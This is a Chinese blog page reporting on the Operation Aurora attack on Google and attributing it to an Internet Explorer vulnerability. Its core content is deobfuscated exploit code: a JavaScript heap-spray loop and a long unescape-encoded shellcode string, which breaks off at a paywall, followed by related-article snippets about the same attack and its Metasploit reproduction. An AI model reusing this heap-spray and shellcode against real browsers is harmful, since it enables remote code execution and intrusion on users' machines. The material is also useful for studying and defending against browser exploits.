极光行动:攻击Google的代码曝光

最新推荐文章于 2024-07-05 10:51:51 发布
最新推荐文章于 2024-07-05 10:51:51 发布
阅读量2k 收藏 3
点赞数
文章标签: google c 加密 adobe rackspace ie
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yushiqiang1688/article/details/5209629
版权
本文揭露了Google遭受攻击的原因并非Adobe PDF漏洞,而是由一个未公开的IE漏洞引发。Metasploit博客提供了利用该漏洞的攻击代码,文章详细介绍了攻击的复杂性和加密技术。微软确认Windows XP上的IE 6最易受攻击,并发布了安全建议。McAfee发现攻击者使用了多层次加密,创建了名为Auroro的复杂攻击。
摘要由CSDN通过智能技术生成

TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google被攻击的声明,承认McAfee所说的IE漏洞才是祸源。

文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下:

【去混淆后的代码】

 

Evals

  • var n = unescape("%u0c0d%u0c0d");
while (n.length = 524288)n += n;
n = n.substring(0, 524269 - sc.length);
var x = new Array();
for (var i = 0; i  200; i ++ ){
     
  x[i] = n + sc;
}
    (repeated 1 time)

Writes

  • htmlscriptvar sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%u
最低0.47元/天 解锁文章
yushiqiang1688
关注
Metasploit学习笔记之——用Metasploit模拟谷歌极光攻击
JochenZou的专栏
12-20 6250
Metasploit模拟谷歌极光攻击重现 本攻击重现是简化的一个攻击过程,省略了前期情报搜集阶段中外围信息搜索、主机探测与端口扫描、服务扫描与查点、网络漏洞扫描等工作,目的是在最短的时间内模拟渗透攻击的核心环节,是对后续的复杂网络渗透攻击和网络安全防护所做的前期工作。 1.      准备工作 1.1   攻击路线图 下图为此次实验的攻击路线图,主要实现了
极光行动攻击Google代码曝光(Google快爬我的文章啊。为了在网络上永存!)
xeon_pan的专栏
01-18 1321
TechWeb旗下的DarkReading发表文章,透露iDefense已经收回之前发布的Adobe PDF漏洞导致Google攻击的声明,承认McAfee所说的IE漏洞才是祸源。 文章还给出了一个链接,指向开源渗透测试工具项目Metasploit的博客,上面给出了利用这个IE漏洞的攻击代码链接。代码如下: 【去混淆后的代码】 Evals var n = unescape("%u0c0d
网络安全威胁——APT攻击_apt攻击预测案例
最新发布
ewii12567的博客
07-05 1915
Google Aurora极光攻击是由一个有组织的网络犯罪团伙精心策划的有针对性的网络攻击攻击团队向Google发送了一条带有恶意连接的消息,当Google员工点击了这条恶意连接时,会自动向攻击者的C&C Server(Command and Control Server)发送一个指令,并下载远程控制木马到电脑上,成为“肉鸡”,再利用内网渗透、暴力破解等方式获取服务器的管理员权限,员工电脑被远程控制长达数月之久,其被窃取的资料数不胜数,造成不可估量的损失。渗透手段确定后,下一步则需要制作特定的恶意软件。
极光行动
weixin_30954607的博客
09-16 2658
极光行动漏洞背景极光行动(英语:Operation Aurora)或欧若拉行动是2009年12月中旬可能源自中国的一场网络攻击,其名称“Aurora”(意为极光、欧若拉)来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外,还有20多家公司:其中包括Adobe Systems、Juniper Networks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化...
攻击Google极光行动最新报告曝光
weixin_34313182的博客
02-12 817
据DarkReading网站报道,HBGary公司的创始人和CEO,也是著名安全专家(《Rootkits》一书作者)Greg Hoglund正在与其他安全专家调查攻击GoogleAdobe等公司的极光行动。近日,他发布了一个报告,透露了一些目前调查的进展。报告中称,攻击中使用的CRC算法来自中国,而且许多攻击都来自中国常州一个叫3322.org的网站,这个网站的主人是中国人Peng Yong,他...
McAfee:“极光攻击”将会盛行
weixin_33701564的博客
09-24 102
在周三的RSA 2010大会发言中,McAfee的研究人员表示,以获取企业源代码为目的的网络犯罪正在盛行,而企业对此方面的保护略显不足。 在RSA 2010上,McAfee展示了一个分析报告,关于对Perforce公司(一个做住房产权软件的公司)的调查。McAfee帮助该公司找到了诸多安全隐患,比如一个在今年很著名的Internet Explorer 6漏洞,这个漏洞被命名为“极...
极光极光
02-09
因此,"Aurora-main"可能包含"极光"项目的基础代码,这些代码可能使用JavaScript编写,用于实现服务器功能或者其他特定的业务逻辑。 JavaScript在服务器端的应用,如Node.js,使得开发者可以用同一种语言处理前端和...
极光大数据:上海车展新能源汽车客群研究报告.pdf
07-29
极光大数据:上海车展新能源汽车客群研究报告 本报告基于极光大数据平台对2017上海车展新能源汽车客群的研究报告,旨在洞察新能源汽车展台的客流情况和新能源的关注情况,分析国产新能源观众在展前、展中、展后的...
极光王:2021年半年度报告.zip
09-29
极光王:2021年半年度报告》是一份深入分析与解读极光王公司在2021年上半年业务发展、市场表现、财务状况和技术趋势的重要文档。这份报告不仅揭示了公司运营的核心数据,还可能包含对未来战略的展望,为投资者、...
Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
Epsilon
03-02 5023
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux下利用 metasploit 渗透。 msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
极光行动漏洞分析
w_g3366的博客
09-04 2923
极光行动 流量分析 流量包记录不多,共39条记录,两组会话 流量包不是很多,可以直接使用流追踪分析: 会话一分析: //发起请求 GET /info HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en...
使用虚拟登录页面jsp,跳过登录页,直接访问主页面
Cusea的博客
01-31 1万+
最近在修改项目的一个模块,项目本身是java + springMVC开发的,重新用.net来写一个模块块,因此需要从主页面跳转到.net页面,再从.net页面返回登录成功的主页面,现总结如下: 跳转到.net页面,在主页面图标添加点击事件。在URL中添加.net页面需要的参数即可; 从.net页面返回时,需要创建一个新的jsp,本项目中, 原来的登录界面 我的jsp是这样的:
近5年典型的的APT攻击事件
热门推荐
煮酒闲谈
08-08 2万+
APT攻击 APT攻击是近几年来出现的一种高级攻击,具有难检测、持续时间长和攻击目标明确等特征。 本文中,整理了近年来比较典型的几个APT攻击,并其攻击过程做了分析 (为了加深自己对APT攻击的理解和学习) Google极光攻击 2010年的Google Aurora(极光)攻击是一个十分著名的APT攻击Google的一名雇员点击即时消息中的一条恶意链接,引发了一系列事件导致这个搜
八大典型APT攻击过程详解
树木_xzw的博客
01-13 3816
八大典型APT攻击过程详解 2013-08-27 17:55 启明星辰 yepeng 51CTO.com 字号:T | T APT攻击是近几年来出现的一种高级攻击,具有难检测、持续时间长和攻击目标明确等特征。本文中,小编带你细数一下近年来比较典型的几个APT攻击,分析一下它们的攻击过程。 AD:51CTO 网+首届APP创新评选大赛火热启动——超百万资源等你拿!
我看APT攻防对抗(2):APT攻击的案例
weixin_30797199的博客
07-21 1660
我看APT攻防对抗(2):APT攻击的案例 FlashSky of code audit labs of vulnhunt.com 翰海源:立志于让安全成为IT系统基础属性;帮助客户改进自身系统的安全,以及实现对APT攻击的检测与防御. 目前APT攻击发布细节出来的案例,基本都是以美国公布的。但是不代表APT攻击只针对欧美,主要原因在于,美国由于IT技术的发达成为APT攻击 的首要...
APT案例调研和研究
taylorswift的博客
01-03 1367
APT案例调研和研究 1.整理国内外2个影响较大的APT攻击案例,简述其步骤和过程: Google极光攻击 2010年的Google Aurora(极光)攻击是一个十分著名的APT攻击Google的一名雇员点击即时消息中的一条恶意链接,引发了一系列事件导致这个搜索引擎巨人的网络被渗入数月,并且造成各种系统的数据被窃取。这次攻击Google和其它大约20家公司为目标,它是由一个有组织的网络犯罪团体精心策划的,目的是长时间地渗入这些企业的网络并窃取数据。 该攻击过程大致如下: 对Google的APT行动
网络安全威胁——APT攻击
聚集机器学习、信息安全
10-06 4099
高级持续性威胁(APT,Advanced Persistent Threat),又叫高级长期威胁,是一种复杂的、持续的网络攻击,本文详细介绍了APT攻击的概念、方法和典型案例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值